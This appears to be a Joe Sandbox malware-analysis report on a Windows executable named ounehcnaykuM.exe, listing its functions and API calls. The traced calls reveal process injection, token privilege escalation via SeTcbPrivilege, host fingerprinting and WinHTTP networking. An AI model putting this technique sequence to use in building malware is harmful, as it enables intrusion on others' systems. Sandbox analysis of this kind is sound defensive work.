Part of subcall function 001EA660: SysFreeString.OLEAUT32(00000001), ref: 001EA683

SysFreeString.OLEAUT32(?), ref: 001E24BB

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

SysFreeString.OLEAUT32(?), ref: 001E23B8

Part of subcall function 001EB300: SysFreeString.OLEAUT32(?), ref: 001EB318
Part of subcall function 001EB300: SysFreeString.OLEAUT32(?), ref: 001EB321

Strings

p9?, xrefs: 001E2404

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E43F0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145

APIs

Part of subcall function 001E6E00: GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 001E6E5D

Part of subcall function 001EFBD0: GetProcAddress.KERNEL32(00000000,?), ref: 001EFC4F
Part of subcall function 001EFBD0: GetProcAddress.KERNEL32(00000000,?), ref: 001EFC72
Part of subcall function 001EFBD0: GetProcAddress.KERNEL32(00000000,?), ref: 001EFC95
Part of subcall function 001EFBD0: GetProcAddress.KERNEL32(00000000,?), ref: 001EFCB8

SHGetFolderPathW.SHELL32(00000000,0000001C,?,00000000,?), ref: 001E4451

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Part of subcall function 001EC430: GetProcAddress.KERNEL32(00000000,?), ref: 001EC4E2
Part of subcall function 001EC430: GetProcAddress.KERNEL32(00000000,?), ref: 001EC505
Part of subcall function 001EC430: GetProcAddress.KERNEL32(00000000,?), ref: 001EC528
Part of subcall function 001EC430: GetProcAddress.KERNEL32(00000000,?), ref: 001EC54B
Part of subcall function 001EC430: GetLastError.KERNEL32 ref: 001EC6BB

Strings

p9?, xrefs: 001E4480, 001E44BA, 001E44D6, 001E44F3, 001E4509, 001E455E
D, xrefs: 001E4532

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EB020, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143

APIs

_wtoi.MSVCRT ref: 001EB047

Part of subcall function 001E6190: _itow.MSVCRT ref: 001E61DE

_wtoi.MSVCRT ref: 001EB091

Part of subcall function 001E43F0: SHGetFolderPathW.SHELL32(00000000,0000001C,?,00000000,?), ref: 001E4451

Part of subcall function 001E89B0: memset.MSVCRT ref: 001E89FA
Part of subcall function 001E89B0: memset.MSVCRT ref: 001E8A0C
Part of subcall function 001E89B0: memcpy.MSVCRT ref: 001E8F45

Part of subcall function 001EDF10: memcpy.MSVCRT ref: 001EDF48

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Part of subcall function 001E1690: memset.MSVCRT ref: 001E16CE

Strings

p9?, xrefs: 001EB0AA

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EF660, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128

APIs

_wtoi.MSVCRT ref: 001EF6D2

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

memcpy.MSVCRT ref: 001EF744

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Strings

p9?, xrefs: 001EF706

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EFAD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87

APIs

Part of subcall function 001E1690: memset.MSVCRT ref: 001E16CE

??3@YAXPAX@Z.MSVCRT ref: 001EFB8D

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

??3@YAXPAX@Z.MSVCRT ref: 001EFBA4

Part of subcall function 001E6EE0: ??3@YAXPAX@Z.MSVCRT ref: 001E6F12

Strings

p9?, xrefs: 001EFB6C, 001EFBAC

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E3710, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56

APIs

SysFreeString.OLEAUT32(?), ref: 001E3748
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 001E3773

Strings

p9?, xrefs: 001E374E, 001E375C

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E8320, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47

APIs

WinHttpCloseHandle.WINHTTP(?,00000000,00000000,00000001,?,001F2FF0,?,00000000), ref: 001E8330
WinHttpConnect.WINHTTP(?,?,001F2FF0,00000000,00000001,00000000,00000000,00000001,?,001F2FF0,?,00000000), ref: 001E835D

Strings

q*\n)W\n, xrefs: 001E8330

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E1B70, Relevance: 5.1, APIs: 4, Instructions: 62

APIs

Part of subcall function 001E5050: WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,001F8880,?), ref: 001E508D

memset.MSVCRT ref: 001E1BA3
memset.MSVCRT ref: 001E1BB2

Part of subcall function 001E4A60: GetProcAddress.KERNEL32(00000000), ref: 001E4AC4

??2@YAPAXI@Z.MSVCRT ref: 001E1BC9
??2@YAPAXI@Z.MSVCRT ref: 001E1BE8

Part of subcall function 001F1690: wsprintfW.USER32 ref: 001F1829
Part of subcall function 001F1690: rand.MSVCRT ref: 001F1880

Part of subcall function 001ECF80: _time64.MSVCRT ref: 001ECF92
Part of subcall function 001ECF80: _time64.MSVCRT ref: 001ECFD9

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Analysis Process: ounehcnaykuM.exe PID: 3060 Parent PID: 2532

Execution Graph

Execution Coverage:	22.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.1%
Total number of Nodes:	700
Total number of Limit Nodes:	15

Executed Functions

Function 0017FE30, Relevance: 25.2, APIs: 13, Strings: 1, Instructions: 661
threadsleep

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00173EB0: ??2@YAPAXI@Z.MSVCRT ref: 00173EB7
Part of subcall function 00173EB0: memset.MSVCRT ref: 00173ECD

Sleep.KERNELBASE(00000001), ref: 0017FE80
SetCurrentDirectoryW.KERNELBASE(?), ref: 0017FEF3
srand.MSVCRT ref: 0017FF04

Part of subcall function 0017EDA0: LoadLibraryW.KERNEL32(?), ref: 0017EDF2
Part of subcall function 0017EDA0: LoadLibraryW.KERNEL32(?), ref: 0017EE19
Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE47
Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE6F
Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE97
Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E50000,?), ref: 0017EEBF
Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E30000,?), ref: 0017EEE7

Part of subcall function 0017BC10: CoInitializeEx.OLE32(00000000,00000000), ref: 0017BC14
Part of subcall function 0017BC10: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0017BC33

GetCurrentProcess.KERNEL32(?), ref: 0017FF44
IsWow64Process.KERNELBASE(00000000), ref: 0017FF4B
??2@YAPAXI@Z.MSVCRT ref: 0017FF74

Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 00176386
Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 0017639E
Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 001764AC
Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 001764B2
Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 001764B8
Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 001764F9
Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 00176517
Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 00176538
Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 0017660F
Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 00176618
Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 0017661E

??3@YAXPAX@Z.MSVCRT ref: 0017FFB1

Part of subcall function 00171B70: memset.MSVCRT ref: 00171BA3
Part of subcall function 00171B70: memset.MSVCRT ref: 00171BB2
Part of subcall function 00171B70: ??2@YAPAXI@Z.MSVCRT ref: 00171BC9
Part of subcall function 00171B70: ??2@YAPAXI@Z.MSVCRT ref: 00171BE8

??2@YAPAXI@Z.MSVCRT ref: 00180004

Part of subcall function 00171F50: memcpy.MSVCRT ref: 00171FEC

Part of subcall function 00176A70: ??2@YAPAXI@Z.MSVCRT ref: 00176A86
Part of subcall function 00176A70: ??2@YAPAXI@Z.MSVCRT ref: 00176AA1
Part of subcall function 00176A70: ??3@YAXPAX@Z.MSVCRT ref: 00176BB0
Part of subcall function 00176A70: ??3@YAXPAX@Z.MSVCRT ref: 00176BDE
Part of subcall function 00176A70: ??3@YAXPAX@Z.MSVCRT ref: 00176C48
Part of subcall function 00176A70: ??3@YAXPAX@Z.MSVCRT ref: 00176CA1

Part of subcall function 0017FAD0: ??3@YAXPAX@Z.MSVCRT ref: 0017FB8D
Part of subcall function 0017FAD0: ??3@YAXPAX@Z.MSVCRT ref: 0017FBA4

Part of subcall function 00175780: ??2@YAPAXI@Z.MSVCRT ref: 001757D5
Part of subcall function 00175780: ??3@YAXPAX@Z.MSVCRT ref: 0017582F

CreateThread.KERNEL32(00000000,00000000,00182A70,?,00000000,?,?,?,?), ref: 001800FA
_time64.MSVCRT ref: 0018014D

Part of subcall function 0017DA20: ??2@YAPAXI@Z.MSVCRT ref: 0017DA7A
Part of subcall function 0017DA20: ??3@YAXPAX@Z.MSVCRT ref: 0017DAB9
Part of subcall function 0017DA20: _time64.MSVCRT ref: 0017DADB
Part of subcall function 0017DA20: ??3@YAXPAX@Z.MSVCRT ref: 0017DB0B

Part of subcall function 00181D50: ??2@YAPAXI@Z.MSVCRT ref: 00181D7F
Part of subcall function 00181D50: ??3@YAXPAX@Z.MSVCRT ref: 00181DBE
Part of subcall function 00181D50: _time64.MSVCRT ref: 00181DE0
Part of subcall function 00181D50: ??3@YAXPAX@Z.MSVCRT ref: 00181E0D

_time64.MSVCRT ref: 001804B4

Part of subcall function 0017C980: _itow.MSVCRT ref: 0017C999

Part of subcall function 0017ADB0: ??3@YAXPAX@Z.MSVCRT ref: 0017ADEF
Part of subcall function 0017ADB0: ??3@YAXPAX@Z.MSVCRT ref: 0017AF9A

Part of subcall function 001814C0: WSAStartup.WS2_32(00000202,?), ref: 001814E2
Part of subcall function 001814C0: gethostname.WS2_32(?,000000FF), ref: 00181502
Part of subcall function 001814C0: getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 00181522
Part of subcall function 001814C0: freeaddrinfo.WS2_32(00000000), ref: 00181580
Part of subcall function 001814C0: WSACleanup.WS2_32 ref: 00181586

Part of subcall function 00175A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001800C1), ref: 00175B3F

_time64.MSVCRT ref: 00180338

Part of subcall function 001737C0: memcpy.MSVCRT ref: 00173CA0

Part of subcall function 00172030: ??2@YAPAXI@Z.MSVCRT ref: 0017207A
Part of subcall function 00172030: ??3@YAXPAX@Z.MSVCRT ref: 00172176
Part of subcall function 00172030: _time64.MSVCRT ref: 001721A8
Part of subcall function 00172030: ??3@YAXPAX@Z.MSVCRT ref: 001721CF

Part of subcall function 00179AB0: WSAStartup.WS2_32(00000202,?), ref: 00179ADA
Part of subcall function 00179AB0: freeaddrinfo.WS2_32(00000000,0018043A), ref: 00179B3B
Part of subcall function 00179AB0: getaddrinfo.WS2_32(0018043A,00000000,?,00000000), ref: 00179BD6
Part of subcall function 00179AB0: freeaddrinfo.WS2_32(00000000), ref: 00179C1E
Part of subcall function 00179AB0: WSACleanup.WS2_32 ref: 00179C44

Part of subcall function 00182AD0: ??2@YAPAXI@Z.MSVCRT ref: 00182ADD
Part of subcall function 00182AD0: ??3@YAXPAX@Z.MSVCRT ref: 00182B54
Part of subcall function 00182AD0: _time64.MSVCRT ref: 00182B82
Part of subcall function 00182AD0: ??3@YAXPAX@Z.MSVCRT ref: 00182BAA

Part of subcall function 0017EAC0: CoCreateInstance.OLE32(0018708C,00000000,00000001,00186E7C,00000004,00188880,000003E7,0017FF87), ref: 0017EB17

Part of subcall function 00182BC0: ??2@YAPAXI@Z.MSVCRT ref: 00182C56
Part of subcall function 00182BC0: ??2@YAPAXI@Z.MSVCRT ref: 00182C90
Part of subcall function 00182BC0: ??2@YAPAXI@Z.MSVCRT ref: 00182CDB
Part of subcall function 00182BC0: ??3@YAXPAX@Z.MSVCRT ref: 00182D75
Part of subcall function 00182BC0: ??3@YAXPAX@Z.MSVCRT ref: 00182D8A
Part of subcall function 00182BC0: ??3@YAXPAX@Z.MSVCRT ref: 00182D9E

ExitProcess.KERNEL32 ref: 00180706

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Part of subcall function 001735E0: CreateMutexW.KERNELBASE(?,00000001,?), ref: 0017366B
Part of subcall function 001735E0: ExitProcess.KERNEL32 ref: 0017368E

Strings

D, xrefs: 0018061D

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017C430, Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 381
libraryprocess

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 0017C4E2
GetProcAddress.KERNEL32(00000000,?), ref: 0017C505
GetProcAddress.KERNEL32(00000000,?), ref: 0017C528
GetProcAddress.KERNEL32(00000000,?), ref: 0017C54B
AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,?,?), ref: 0017C5CD
GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,80000000), ref: 0017C6B5
GetLastError.KERNEL32 ref: 0017C6BB

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

GetTokenInformation.KERNELBASE(?,00000001,00000000,80000000,80000000), ref: 0017C6FC
CreateProcessAsUserW.KERNEL32(?,00000000,08000424,00000000,00000000,00000000,FFFFFFFF,08000424,00000000,00000044,?), ref: 0017C802
AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 0017C893

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Strings

, xrefs: 0017C77B
SeTcbPrivilege, xrefs: 0017C594
D, xrefs: 0017C460

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00415D50, Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 505
librarynative

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,00000040), ref: 00415E06
LoadLibraryA.KERNEL32(00000000), ref: 00416118
GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,00000004,?,00000040), ref: 00416173
GetProcAddress.KERNEL32(00000000,00000002,00000000,00000000,?,?,?,?,?,00000004,?,00000040), ref: 0041619B
NtQueryInformationProcess.NTDLL(?,00000000,00000000,00000018,00000000), ref: 0041634A

Strings

, xrefs: 00416240

Memory Dump Source

Source File: 00000015.00000002.10778449992.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_ounehcnaykuM.jbxd

Function 00172530, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 159

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,00000105,*.*), ref: 001725DB

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

Part of subcall function 00180E20: _vsnwprintf.MSVCRT ref: 00180E52

FindNextFileW.KERNELBASE(00000000,00000010), ref: 001726B3
GetLastError.KERNEL32 ref: 001726BD

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Strings

*.*, xrefs: 0017259F

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00180E90, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 115

APIs

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

GetAdaptersInfo.IPHLPAPI(00000000,00000288,?,00000000,?,00180130,00000000), ref: 00180EE5

Part of subcall function 00180E20: _vsnwprintf.MSVCRT ref: 00180E52

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Strings

%02X, xrefs: 00180F6B

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 001776E0, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 128

APIs

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

memcpy.MSVCRT ref: 001777B9

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Strings

, xrefs: 0017772E

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 001767C0, Relevance: 1.6, APIs: 1, Instructions: 66native

APIs

NtQueryInformationProcess.NTDLL(00003000,00000000,0017CB21,00000018,00000000,0017CB21,001800C1,00000000), ref: 001767E8

Part of subcall function 00176DA0: ReadProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0017CE54,?,?,?,00000070,00000000), ref: 00176DC9

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00179640, Relevance: 1.5, APIs: 1, Instructions: 4

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000BC7B), ref: 00179645

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017F9A0, Relevance: .1, Instructions: 115

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017E230, Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 434
librarythread

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0017E25C

Part of subcall function 00177B30: WriteProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0017CE7B,?,?,?,00000070,?,?,?), ref: 00177B5C

GetProcAddress.KERNEL32(0017CB21,?), ref: 0017E3F1
GetProcAddress.KERNEL32(0017CB21,?), ref: 0017E419
GetProcAddress.KERNEL32(0017CB21,?), ref: 0017E441
GetProcAddress.KERNEL32(0017CB21,?), ref: 0017E469
GetProcAddress.KERNEL32(0017CB21,?), ref: 0017E491
GetProcAddress.KERNEL32(0017CB21,?), ref: 0017E4B9
GetProcAddress.KERNEL32(0017CB21,?), ref: 0017E4E1
GetProcAddress.KERNEL32(0017CB21,?), ref: 0017E509

Part of subcall function 001767C0: NtQueryInformationProcess.NTDLL(00003000,00000000,0017CB21,00000018,00000000,0017CB21,001800C1,00000000), ref: 001767E8

ResumeThread.KERNELBASE(?), ref: 0017E60F

